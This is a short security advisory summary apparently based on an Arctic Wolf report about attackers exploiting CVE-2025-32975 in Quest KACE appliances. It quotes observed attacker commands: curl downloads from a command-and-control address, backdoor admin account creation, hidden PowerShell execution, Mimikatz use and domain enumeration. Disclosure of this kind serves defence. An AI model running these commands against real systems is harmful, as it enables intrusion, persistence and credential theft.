Critical Vulnerability CVE-2025-32975 Exploited in Quest KACE Systems

Critical Vulnerability CVE-2025-32975 Exploited in Quest KACE Systems

🚨 Starting the week of March 9, 2026, Arctic Wolf observed malicious activity in customer environments potentially linked to the exploitation of CVE-2025-32975 on unpatched Quest KACE Systems Management Appliance (SMA) instances that were publicly exposed to the internet. This vulnerability was patched in May 2025.

Quest KACE SMA is an on-premises appliance for centralized endpoint management, providing inventory, software deployment, patching, and endpoint monitoring capabilities. CVE-2025-32975 is a critical authentication bypass vulnerability that allows threat actors to impersonate legitimate users without valid credentials. The flaw exists in the SSO authentication handling mechanism and can result in complete administrative takeover. Arctic Wolf is not aware of any reports of exploitation of CVE-2025-32975 and has not identified a publicly available proof-of-concept.

Observed Malicious Activity

Initial access was suspected via CVE-2025-32975, as threat actors achieved administrative takeover shortly after. Observed activity included the following:

• Exploited KPluginRunProcess functionality in KACE to execute remote commands.
• Analysis of KACE logs revealed Base64-encoded payloads.
• Downloaded files via curl from 216.126.225.156 to establish command-and-control communication.
• For persistence, threat actors created additional administrative accounts via runkbot.exe (Quest KACE process) and attempted to add them to administrative groups using commands such as net localgroup administrators ooo1 /add and net group "domain admins" ooo2 /add.
• Attackers also executed PowerShell scripts in a bypassed and hidden context, specifically powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\temp\Enable-UpdateServices.ps1".
• Registry modifications via taskband.ps1 were observed for potential persistence or system configuration changes.

Credential Harvesting

Credential harvesting was performed using Mimikatz, including one instance disguised as asd.exe. Local system enumeration included:

• quser.exe to enumerate logged-in users.
• net localgroup administrators to list admin accounts.
• net user to enumerate all user accounts.

Domain administrative structure enumeration involved:

• net group "domain admins" /domain > c:\1.txt
• net group "domain controllers" /domain >> c:\1.txt.

Network and domain discovery was conducted using:

• net time /domain > c:\1.txt
• net group "domain controllers" /domain.

Lateral movement included gaining RDP access to backup infrastructure (Veeam, Veritas) and domain controllers. Arctic Wolf strongly recommends that customers upgrade to the latest fixed version. Additionally, Arctic Wolf strongly recommends that KACE SMA instances not be exposed to the public internet. If remote access is required, it should be restricted through a VPN or firewall.

For more details, Read full article